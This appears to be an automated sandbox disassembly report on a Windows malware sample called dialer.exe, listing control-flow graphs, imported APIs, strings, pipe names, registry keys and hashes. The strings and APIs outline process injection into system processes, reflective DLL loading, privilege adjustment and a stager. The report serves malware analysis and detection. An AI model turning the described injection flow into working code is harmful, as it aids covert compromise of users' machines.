                                            control_flow_graph 26 7ff78ab310c0-7ff78ab31110 call 7ff78ab319ac 29 7ff78ab314c5-7ff78ab314e1 26->29 30 7ff78ab31116-7ff78ab3111c 26->30 30->29 31 7ff78ab31122-7ff78ab31138 OpenProcess 30->31 31->29 32 7ff78ab3113e-7ff78ab3115b OpenProcess 31->32 33 7ff78ab31208-7ff78ab31229 NtQueryInformationProcess 32->33 34 7ff78ab31161-7ff78ab31178 K32GetModuleFileNameExW 32->34 37 7ff78ab314bc-7ff78ab314bf CloseHandle 33->37 38 7ff78ab3122f-7ff78ab31235 33->38 35 7ff78ab311aa-7ff78ab311b6 CloseHandle 34->35 36 7ff78ab3117a-7ff78ab31195 PathFindFileNameW lstrlenW 34->36 35->33 41 7ff78ab311b8-7ff78ab311df 35->41 36->35 40 7ff78ab31197-7ff78ab311a7 StrCpyW 36->40 37->29 38->37 39 7ff78ab3123b-7ff78ab31253 OpenProcessToken 38->39 39->37 42 7ff78ab31259-7ff78ab3127f GetTokenInformation 39->42 40->35 43 7ff78ab311e3-7ff78ab311f5 StrCmpIW 41->43 44 7ff78ab312fc 42->44 45 7ff78ab31281-7ff78ab3128a GetLastError 42->45 43->37 46 7ff78ab311fb-7ff78ab31206 43->46 48 7ff78ab31303-7ff78ab31311 CloseHandle 44->48 45->44 47 7ff78ab3128c-7ff78ab312a0 LocalAlloc 45->47 46->33 46->43 47->44 49 7ff78ab312a2-7ff78ab312c8 GetTokenInformation 47->49 48->37 50 7ff78ab31317-7ff78ab3131e 48->50 51 7ff78ab312ea 49->51 52 7ff78ab312ca-7ff78ab312e8 GetSidSubAuthorityCount GetSidSubAuthority 49->52 50->37 53 7ff78ab31324-7ff78ab3132f 50->53 54 7ff78ab312f1-7ff78ab312fa LocalFree 51->54 52->54 53->37 55 7ff78ab31335-7ff78ab3133f 53->55 54->48 55->37 56 7ff78ab31345-7ff78ab3134f 55->56 56->37 57 7ff78ab31355-7ff78ab31395 call 7ff78ab32010 * 3 56->57 57->37 64 7ff78ab3139b-7ff78ab313bb call 7ff78ab32010 StrStrA 57->64 67 7ff78ab313bd-7ff78ab313cc 64->67 68 7ff78ab313d3-7ff78ab313f8 call 7ff78ab32010 * 2 64->68 67->64 69 7ff78ab313ce 67->69 68->37 74 7ff78ab313fe-7ff78ab31425 VirtualAllocEx 68->74 69->37 74->37 75 7ff78ab3142b-7ff78ab31444 WriteProcessMemory 74->75 75->37 76 7ff78ab31446-7ff78ab31468 call 7ff78ab318f8 75->76 76->37 79 7ff78ab3146a-7ff78ab31472 76->79 79->37 80 7ff78ab31474-7ff78ab3147a 79->80 81 7ff78ab3147c-7ff78ab31481 80->81 82 7ff78ab31483-7ff78ab31490 WaitForSingleObject 80->82 83 7ff78ab314b6 CloseHandle 81->83 84 7ff78ab314b1 82->84 85 7ff78ab31492-7ff78ab314a6 GetExitCodeThread 82->85 83->37 84->83 85->84 86 7ff78ab314a8-7ff78ab314ae 85->86 86->84
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1875469860.00007FF78AB31000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF78AB30000, based on PE: true
                                            • Associated: 00000004.00000002.1875398474.00007FF78AB30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                            • Associated: 00000004.00000002.1876210894.00007FF78AB33000.00000002.00000001.01000000.00000000.sdmpDownload File
                                            • Associated: 00000004.00000002.1876378159.00007FF78AB36000.00000002.00000001.01000000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ff78ab30000_dialer.jbxd
                                            Similarity
                                            • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileLocalName$CodeCountErrorExitFindFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
                                            • String ID: @$MSBuild.exe$ReflectiveDllMain$WmiPrvSE.exe$dialer.exe
                                            • API String ID: 2561231171-2835194517
                                            • Opcode ID: 544d3209d9aa9e6ba5ca7d9f2d2eefc3a9e0a6ddaab6f3d4a2b6f9620268a1a8
                                            • Instruction ID: ec45e5ec30106472c26ff59dd88b6f6ebc29bb989249f860423906725543c200
                                            • Opcode Fuzzy Hash: 544d3209d9aa9e6ba5ca7d9f2d2eefc3a9e0a6ddaab6f3d4a2b6f9620268a1a8
                                            • Instruction Fuzzy Hash: F3B17175E0A642A6FB10AF12E88027ABBE5FF44B84FA08179CA4E47B54DF3CE545C750

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1875469860.00007FF78AB31000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF78AB30000, based on PE: true
                                            • Associated: 00000004.00000002.1875398474.00007FF78AB30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                            • Associated: 00000004.00000002.1876210894.00007FF78AB33000.00000002.00000001.01000000.00000000.sdmpDownload File
                                            • Associated: 00000004.00000002.1876378159.00007FF78AB36000.00000002.00000001.01000000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ff78ab30000_dialer.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                            • String ID:
                                            • API String ID: 4084875642-0
                                            • Opcode ID: 0c5f04347bf6d44913e8b334837d31c7522880c0df581b7b1d3a354cacd3bc02
                                            • Instruction ID: ec3cceac381b3972f2706011c7956d41b17d5cfe69c9080ac55e8ebf5cc66466
                                            • Opcode Fuzzy Hash: 0c5f04347bf6d44913e8b334837d31c7522880c0df581b7b1d3a354cacd3bc02
                                            • Instruction Fuzzy Hash: AD51C532F16A826AFB60EF62E8446BAAAE4FB45B84F944038DE0D47B54DF3CD445C710

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1875469860.00007FF78AB31000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF78AB30000, based on PE: true
                                            • Associated: 00000004.00000002.1875398474.00007FF78AB30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                            • Associated: 00000004.00000002.1876210894.00007FF78AB33000.00000002.00000001.01000000.00000000.sdmpDownload File
                                            • Associated: 00000004.00000002.1876378159.00007FF78AB36000.00000002.00000001.01000000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ff78ab30000_dialer.jbxd
                                            Similarity
                                            • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                            • String ID:
                                            • API String ID: 3197395349-0
                                            • Opcode ID: 81527eae8623b787a181e0c46c37d2868846c75f5fa2d30b1d243af947967be4
                                            • Instruction ID: b4aac9d01c3c23d33ff5c4e64b0eccd2606a1103a741ce8c082beaf0d3d465bb
                                            • Opcode Fuzzy Hash: 81527eae8623b787a181e0c46c37d2868846c75f5fa2d30b1d243af947967be4
                                            • Instruction Fuzzy Hash: FF419A32A15A419AE760DF24E4807AA7BF4FB45B98F90013AEA4D43F98DF38D518CB50

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1875469860.00007FF78AB31000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF78AB30000, based on PE: true
                                            • Associated: 00000004.00000002.1875398474.00007FF78AB30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                            • Associated: 00000004.00000002.1876210894.00007FF78AB33000.00000002.00000001.01000000.00000000.sdmpDownload File
                                            • Associated: 00000004.00000002.1876378159.00007FF78AB36000.00000002.00000001.01000000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ff78ab30000_dialer.jbxd
                                            Similarity
                                            • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                            • String ID: .text$C:\Windows\System32\
                                            • API String ID: 2721474350-832442975
                                            • Opcode ID: 5b6459bf4908e158894d0240be6af7c22007f1fef7840f3adad859f1057e7803
                                            • Instruction ID: fa9ef921285ca575cc0dd9c18b310f5371de72adb2889c21549583d03c19435b
                                            • Opcode Fuzzy Hash: 5b6459bf4908e158894d0240be6af7c22007f1fef7840f3adad859f1057e7803
                                            • Instruction Fuzzy Hash: A6519335B0AA42A2FB21EF51E85466BBBA0FB84B84FA44175DE4D03B94DF3CD409C720

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1875469860.00007FF78AB31000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF78AB30000, based on PE: true
                                            • Associated: 00000004.00000002.1875398474.00007FF78AB30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                            • Associated: 00000004.00000002.1876210894.00007FF78AB33000.00000002.00000001.01000000.00000000.sdmpDownload File
                                            • Associated: 00000004.00000002.1876378159.00007FF78AB36000.00000002.00000001.01000000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ff78ab30000_dialer.jbxd
                                            Similarity
                                            • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                            • String ID: M$\\.\pipe\dialerchildproc64
                                            • API String ID: 2203880229-3489460547
                                            • Opcode ID: 1e8405c3ce3dc3a450943935d6232c4767fdbc18e1eae9273363d4fc7ca69f3e
                                            • Instruction ID: e8ca2ef1abcdab5c583838b92f43f69d931e893bd395d82d1398559793e05a80
                                            • Opcode Fuzzy Hash: 1e8405c3ce3dc3a450943935d6232c4767fdbc18e1eae9273363d4fc7ca69f3e
                                            • Instruction Fuzzy Hash: 27117721E19742A1F714EB51E4143BAEBA0FF54BA1FA44278D65E46ED4CF7CE448C720

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1875469860.00007FF78AB31000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF78AB30000, based on PE: true
                                            • Associated: 00000004.00000002.1875398474.00007FF78AB30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                            • Associated: 00000004.00000002.1876210894.00007FF78AB33000.00000002.00000001.01000000.00000000.sdmpDownload File
                                            • Associated: 00000004.00000002.1876378159.00007FF78AB36000.00000002.00000001.01000000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ff78ab30000_dialer.jbxd
                                            Similarity
                                            • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                            • String ID: \\.\pipe\dialercontrol_redirect64
                                            • API String ID: 2071455217-3440882674
                                            • Opcode ID: e726fb2786c7da4def9263b705b77f3199000bde839af328c4a314f779c2dbfb
                                            • Instruction ID: 9085060b6f372e65205977c3eae1925a92fe2a913197041b96fe574a1ae0da80
                                            • Opcode Fuzzy Hash: e726fb2786c7da4def9263b705b77f3199000bde839af328c4a314f779c2dbfb
                                            • Instruction Fuzzy Hash: B4014420E09642B1F714BB51A80437AEBE0BF51BA1FA482B8D65B02DD4CF7CD448D720

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1875469860.00007FF78AB31000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF78AB30000, based on PE: true
                                            • Associated: 00000004.00000002.1875398474.00007FF78AB30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                            • Associated: 00000004.00000002.1876210894.00007FF78AB33000.00000002.00000001.01000000.00000000.sdmpDownload File
                                            • Associated: 00000004.00000002.1876378159.00007FF78AB36000.00000002.00000001.01000000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ff78ab30000_dialer.jbxd
                                            Similarity
                                            • API ID: Heap$AllocProcess$EnumProcessesSleep
                                            • String ID:
                                            • API String ID: 3676546796-0
                                            • Opcode ID: d2e1c125c576b14afbc05c5ef5102f2ffb5d105b10e46613ced4fa4cc78aada4
                                            • Instruction ID: ee0d9b561c1554ba5b163c6a942a64de4ebf87e6e30e45d1ca52407d4b7eb013
                                            • Opcode Fuzzy Hash: d2e1c125c576b14afbc05c5ef5102f2ffb5d105b10e46613ced4fa4cc78aada4
                                            • Instruction Fuzzy Hash: 75218131E0A712A7F714AB56E45453AFAA1FB81B81FA48078DA4A07F64CF3DE854CB50

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1875469860.00007FF78AB31000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF78AB30000, based on PE: true
                                            • Associated: 00000004.00000002.1875398474.00007FF78AB30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                            • Associated: 00000004.00000002.1876210894.00007FF78AB33000.00000002.00000001.01000000.00000000.sdmpDownload File
                                            • Associated: 00000004.00000002.1876378159.00007FF78AB36000.00000002.00000001.01000000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ff78ab30000_dialer.jbxd
                                            Similarity
                                            • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                                            • String ID:
                                            • API String ID: 1323846700-0
                                            • Opcode ID: 5cc818aebe366c74c24883c76324c687b53e60aeb57db289d72e63b86dd9db26
                                            • Instruction ID: 08678ff370fff0796c95f418416159a1802abee3b9e8d0a8052e97f9d719fec2
                                            • Opcode Fuzzy Hash: 5cc818aebe366c74c24883c76324c687b53e60aeb57db289d72e63b86dd9db26
                                            • Instruction Fuzzy Hash: 93116021F0AA42A5FB18AF56A80006AEEE5BF89B94F688078DE0D03B55DE7DE445C710

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1875469860.00007FF78AB31000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF78AB30000, based on PE: true
                                            • Associated: 00000004.00000002.1875398474.00007FF78AB30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                            • Associated: 00000004.00000002.1876210894.00007FF78AB33000.00000002.00000001.01000000.00000000.sdmpDownload File
                                            • Associated: 00000004.00000002.1876378159.00007FF78AB36000.00000002.00000001.01000000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ff78ab30000_dialer.jbxd
                                            Similarity
                                            • API ID: Process$CloseHandleOpenWow64
                                            • String ID:
                                            • API String ID: 10462204-0
                                            • Opcode ID: ea685a94494dd3c72d9a5f52f0d7d3242b8d37645b818c6e37f69502b31e9c88
                                            • Instruction ID: d756f7ae06c64bbe81abf78bf2b87e3183a25a1b7d49b4f4b5af41a97c19a69a
                                            • Opcode Fuzzy Hash: ea685a94494dd3c72d9a5f52f0d7d3242b8d37645b818c6e37f69502b31e9c88
                                            • Instruction Fuzzy Hash: 09F06221B09B8292FB149F16B484126A6A0FB48BC1F948078DB4D43B48DF3CD445C700

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 00007FF78AB32328: VerSetConditionMask.NTDLL ref: 00007FF78AB32397
                                              • Part of subcall function 00007FF78AB32328: VerSetConditionMask.NTDLL ref: 00007FF78AB323A8
                                              • Part of subcall function 00007FF78AB32328: VerSetConditionMask.NTDLL ref: 00007FF78AB323B9
                                              • Part of subcall function 00007FF78AB32328: VerifyVersionInfoW.KERNEL32 ref: 00007FF78AB323CC
                                              • Part of subcall function 00007FF78AB32328: GetCurrentProcessId.KERNEL32 ref: 00007FF78AB323DE
                                              • Part of subcall function 00007FF78AB32328: OpenProcess.KERNEL32 ref: 00007FF78AB323EE
                                              • Part of subcall function 00007FF78AB32328: OpenProcessToken.ADVAPI32 ref: 00007FF78AB3240F
                                              • Part of subcall function 00007FF78AB32328: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF78AB32429
                                              • Part of subcall function 00007FF78AB32328: AdjustTokenPrivileges.KERNELBASE ref: 00007FF78AB3246D
                                              • Part of subcall function 00007FF78AB32328: GetLastError.KERNEL32 ref: 00007FF78AB32477
                                              • Part of subcall function 00007FF78AB32328: CloseHandle.KERNELBASE ref: 00007FF78AB32480
                                              • Part of subcall function 00007FF78AB32328: FindResourceExA.KERNEL32 ref: 00007FF78AB32494
                                              • Part of subcall function 00007FF78AB32328: SizeofResource.KERNEL32 ref: 00007FF78AB324AB
                                              • Part of subcall function 00007FF78AB32328: LoadResource.KERNEL32 ref: 00007FF78AB324C4
                                              • Part of subcall function 00007FF78AB32328: LockResource.KERNEL32 ref: 00007FF78AB324D6
                                              • Part of subcall function 00007FF78AB32328: GetCurrentProcessId.KERNEL32 ref: 00007FF78AB324E3
                                            • ExitProcess.KERNEL32 ref: 00007FF78AB3231F
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1875469860.00007FF78AB31000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF78AB30000, based on PE: true
                                            • Associated: 00000004.00000002.1875398474.00007FF78AB30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                            • Associated: 00000004.00000002.1876210894.00007FF78AB33000.00000002.00000001.01000000.00000000.sdmpDownload File
                                            • Associated: 00000004.00000002.1876378159.00007FF78AB36000.00000002.00000001.01000000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ff78ab30000_dialer.jbxd
                                            Similarity
                                            • API ID: Process$Resource$ConditionMask$CurrentOpenToken$AdjustCloseErrorExitFindHandleInfoLastLoadLockLookupPrivilegePrivilegesSizeofValueVerifyVersion
                                            • String ID:
                                            • API String ID: 2329183550-0
                                            • Opcode ID: c424f5b466816f57c667fdb355f9c01d35ce1647c2c5f950e20106d890b0f394
                                            • Instruction ID: faee572af9e01b0e5c53a5e7136fcffc07371f700791b0ad390377ee7d8a2169
                                            • Opcode Fuzzy Hash: c424f5b466816f57c667fdb355f9c01d35ce1647c2c5f950e20106d890b0f394
                                            • Instruction Fuzzy Hash: 0EA01200E0A64151F70433B0640502C44907F50601FE004B4C00501541CE2C10048330

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 199 7ff78ab326e8-7ff78ab32710 200 7ff78ab328be-7ff78ab328c6 199->200 201 7ff78ab32716 199->201 204 7ff78ab32b0a-7ff78ab32b2e ReadFile 200->204 205 7ff78ab328cc-7ff78ab328cf 200->205 202 7ff78ab3284a-7ff78ab32882 GetProcessHeap HeapAlloc K32EnumProcesses 201->202 203 7ff78ab3271c-7ff78ab32723 201->203 206 7ff78ab32888-7ff78ab32899 202->206 207 7ff78ab32c00-7ff78ab32c16 202->207 209 7ff78ab32729-7ff78ab3272c 203->209 210 7ff78ab32841-7ff78ab32843 ExitProcess 203->210 204->207 208 7ff78ab32b34-7ff78ab32b3b 204->208 211 7ff78ab32b00-7ff78ab32b05 call 7ff78ab31768 205->211 212 7ff78ab328d5-7ff78ab328da 205->212 206->207 213 7ff78ab3289f-7ff78ab328b7 call 7ff78ab310c0 206->213 208->207 214 7ff78ab32b41-7ff78ab32b55 call 7ff78ab319ac 208->214 215 7ff78ab32732-7ff78ab32735 209->215 216 7ff78ab327e4-7ff78ab3280f RegOpenKeyExW 209->216 211->207 217 7ff78ab328e0-7ff78ab328e3 212->217 218 7ff78ab32aa5-7ff78ab32ab8 call 7ff78ab31a44 212->218 239 7ff78ab328b9 213->239 214->207 240 7ff78ab32b5b-7ff78ab32b61 214->240 224 7ff78ab3273b-7ff78ab3273e 215->224 225 7ff78ab327d5-7ff78ab327df 215->225 222 7ff78ab32811-7ff78ab3281f RegDeleteValueW 216->222 223 7ff78ab32825-7ff78ab3283c call 7ff78ab31ac4 call 7ff78ab31768 call 7ff78ab31000 call 7ff78ab317f8 216->223 227 7ff78ab32921-7ff78ab32932 call 7ff78ab31a44 217->227 228 7ff78ab328e5-7ff78ab328ea 217->228 218->207 243 7ff78ab32abe-7ff78ab32acd call 7ff78ab31a44 218->243 222->223 223->207 234 7ff78ab327c8-7ff78ab327d0 224->234 235 7ff78ab32744-7ff78ab32749 224->235 225->207 227->207 245 7ff78ab32938-7ff78ab3295a ReadFile 227->245 228->207 237 7ff78ab328f0-7ff78ab3291a call 7ff78ab31958 call 7ff78ab31984 ExitProcess 228->237 234->207 235->207 242 7ff78ab3274f-7ff78ab32773 ReadFile 235->242 239->207 246 7ff78ab32b67-7ff78ab32ba2 GetProcessHeap HeapAlloc call 7ff78ab314e4 240->246 247 7ff78ab32beb 240->247 242->207 249 7ff78ab32779-7ff78ab32780 242->249 243->207 264 7ff78ab32ad3-7ff78ab32afb ShellExecuteW 243->264 245->207 252 7ff78ab32960-7ff78ab32967 245->252 268 7ff78ab32bd5-7ff78ab32bdb GetProcessHeap 246->268 269 7ff78ab32ba4-7ff78ab32baa 246->269 253 7ff78ab32bf2-7ff78ab32bfb call 7ff78ab32c18 247->253 249->207 256 7ff78ab32786-7ff78ab3279a call 7ff78ab319ac 249->256 252->207 259 7ff78ab3296d-7ff78ab329ab GetProcessHeap HeapAlloc ReadFile 252->259 253->207 256->207 276 7ff78ab327a0-7ff78ab327a6 256->276 266 7ff78ab32a97-7ff78ab32aa0 GetProcessHeap 259->266 267 7ff78ab329b1-7ff78ab329bd 259->267 264->207 272 7ff78ab32bde-7ff78ab32be9 HeapFree 266->272 267->266 273 7ff78ab329c3-7ff78ab329cf 267->273 268->272 269->268 274 7ff78ab32bac-7ff78ab32bbe 269->274 272->207 273->266 277 7ff78ab329d5-7ff78ab329e0 273->277 278 7ff78ab32bc0-7ff78ab32bc2 274->278 279 7ff78ab32bc4-7ff78ab32bcc 274->279 281 7ff78ab327a8-7ff78ab327b7 call 7ff78ab310c0 276->281 282 7ff78ab327bc-7ff78ab327c3 276->282 283 7ff78ab329e2-7ff78ab329ed 277->283 284 7ff78ab32a05-7ff78ab32a91 lstrlenW GetProcessHeap HeapAlloc call 7ff78ab318b8 * 3 call 7ff78ab32c18 GetProcessHeap HeapFree 277->284 278->279 285 7ff78ab32bd0 call 7ff78ab316d8 278->285 279->268 286 7ff78ab32bce 279->286 281->207 282->253 283->266 288 7ff78ab329f3-7ff78ab32a00 call 7ff78ab31db4 283->288 284->266 285->268 286->274 288->266
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1875469860.00007FF78AB31000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF78AB30000, based on PE: true
                                            • Associated: 00000004.00000002.1875398474.00007FF78AB30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                            • Associated: 00000004.00000002.1876210894.00007FF78AB33000.00000002.00000001.01000000.00000000.sdmpDownload File
                                            • Associated: 00000004.00000002.1876378159.00007FF78AB36000.00000002.00000001.01000000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ff78ab30000_dialer.jbxd
                                            Similarity
                                            • API ID: Process$Open$File$CloseExitHandleHeapName$AllocDeleteEnumFindInformationModulePathProcessesQueryReadTokenValueWow64lstrlen
                                            • String ID: SOFTWARE$dialerstager$open
                                            • API String ID: 3276259517-3931493855
                                            • Opcode ID: 57deca5b7dadaa8d94473ef24676dfbe4cb0f61227f20ab4b3d1e5920c79bf4c
                                            • Instruction ID: 0c56884ac4b1347b2a316815eb2df1e0f25d64bd969edcf236cb9c0a3ffc301d
                                            • Opcode Fuzzy Hash: 57deca5b7dadaa8d94473ef24676dfbe4cb0f61227f20ab4b3d1e5920c79bf4c
                                            • Instruction Fuzzy Hash: 06D1A631E0A682A6FB79AF6598042F9AAD5FF50744FE081B5E90D47E95DF3CE604C320

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1875469860.00007FF78AB31000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF78AB30000, based on PE: true
                                            • Associated: 00000004.00000002.1875398474.00007FF78AB30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                            • Associated: 00000004.00000002.1876210894.00007FF78AB33000.00000002.00000001.01000000.00000000.sdmpDownload File
                                            • Associated: 00000004.00000002.1876378159.00007FF78AB36000.00000002.00000001.01000000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ff78ab30000_dialer.jbxd
                                            Similarity
                                            • API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
                                            • String ID: @
                                            • API String ID: 3462610200-2766056989
                                            • Opcode ID: 703b8677555c06e2b0f299b5c9a482d004feef9bba7614f76242c0c17f04cdf7
                                            • Instruction ID: a2de70f42eb36b7f9d523e5d060635976f24346859cd455a32c052c79afa7ad6
                                            • Opcode Fuzzy Hash: 703b8677555c06e2b0f299b5c9a482d004feef9bba7614f76242c0c17f04cdf7
                                            • Instruction Fuzzy Hash: E161AC32B05A0196FB509F2AE84076EBBE5FB48B88F908179DE4D57B58DF38E445C360
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1875469860.00007FF78AB31000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF78AB30000, based on PE: true
                                            • Associated: 00000004.00000002.1875398474.00007FF78AB30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                            • Associated: 00000004.00000002.1876210894.00007FF78AB33000.00000002.00000001.01000000.00000000.sdmpDownload File
                                            • Associated: 00000004.00000002.1876378159.00007FF78AB36000.00000002.00000001.01000000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ff78ab30000_dialer.jbxd
                                            Similarity
                                            • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                            • String ID: dialersvc64
                                            • API String ID: 4184240511-3881820561
                                            • Opcode ID: 1cf1482e3e3cd0594537fe81606e3316bc30941842e87169c6508401709d1003
                                            • Instruction ID: 51ebeff1711f82edfbbb82850e92d55ef5062f4b050b90bf6544c68a531cac62
                                            • Opcode Fuzzy Hash: 1cf1482e3e3cd0594537fe81606e3316bc30941842e87169c6508401709d1003
                                            • Instruction Fuzzy Hash: 45416F32B05B46A6FB10DF25E8442AE77B5FB88B89F948179DE0D47A24DF38D145C310
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1875469860.00007FF78AB31000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF78AB30000, based on PE: true
                                            • Associated: 00000004.00000002.1875398474.00007FF78AB30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                            • Associated: 00000004.00000002.1876210894.00007FF78AB33000.00000002.00000001.01000000.00000000.sdmpDownload File
                                            • Associated: 00000004.00000002.1876378159.00007FF78AB36000.00000002.00000001.01000000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ff78ab30000_dialer.jbxd
                                            Similarity
                                            • API ID: Delete$CloseEnumOpen
                                            • String ID: SOFTWARE\dialerconfig
                                            • API String ID: 3013565938-461861421
                                            • Opcode ID: e1473c9d781940c188c1c4810ff800916bd5dc84dd697936dace2937510ea816
                                            • Instruction ID: f3172143c39075d9e7d9cdeb704391539103c47d3d2352287e8e5a3c9f2bd447
                                            • Opcode Fuzzy Hash: e1473c9d781940c188c1c4810ff800916bd5dc84dd697936dace2937510ea816
                                            • Instruction Fuzzy Hash: 6E11A722E19A8591FB609F24E8447FAA7A4FB44758F905279D64D0AD98CF3CD148CB24
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1875469860.00007FF78AB31000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF78AB30000, based on PE: true
                                            • Associated: 00000004.00000002.1875398474.00007FF78AB30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                            • Associated: 00000004.00000002.1876210894.00007FF78AB33000.00000002.00000001.01000000.00000000.sdmpDownload File
                                            • Associated: 00000004.00000002.1876378159.00007FF78AB36000.00000002.00000001.01000000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ff78ab30000_dialer.jbxd
                                            Similarity
                                            • API ID: File$Write$CloseCreateHandle
                                            • String ID: \\.\pipe\dialercontrol_redirect64
                                            • API String ID: 148219782-3440882674
                                            • Opcode ID: e51fa25a04711743f107767099e23b895b2e502b334cde0a5e9bfd5133e6eec8
                                            • Instruction ID: d4221b1e97c1137cf4286f51274e37c2dbe99c566c1d1cf98d8133934823e4ab
                                            • Opcode Fuzzy Hash: e51fa25a04711743f107767099e23b895b2e502b334cde0a5e9bfd5133e6eec8
                                            • Instruction Fuzzy Hash: 4F11A032F15B5092F7109B01E408369ABA0FB88FE0FA44279DA2D03B94CF7CD509C750
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1875469860.00007FF78AB31000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF78AB30000, based on PE: true
                                            • Associated: 00000004.00000002.1875398474.00007FF78AB30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                            • Associated: 00000004.00000002.1876210894.00007FF78AB33000.00000002.00000001.01000000.00000000.sdmpDownload File
                                            • Associated: 00000004.00000002.1876378159.00007FF78AB36000.00000002.00000001.01000000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ff78ab30000_dialer.jbxd
                                            Similarity
                                            • API ID: AddressHandleModuleProc
                                            • String ID: ntdll.dll
                                            • API String ID: 1646373207-2227199552
                                            • Opcode ID: 2932c76e980009a225b48c98ed69798072b802092a4ae1a9bffd161348126381
                                            • Instruction ID: 1a08da25de2e50e8a2ee6ce82c4af2fd918b6696203f2198916f7ba43aecff7f
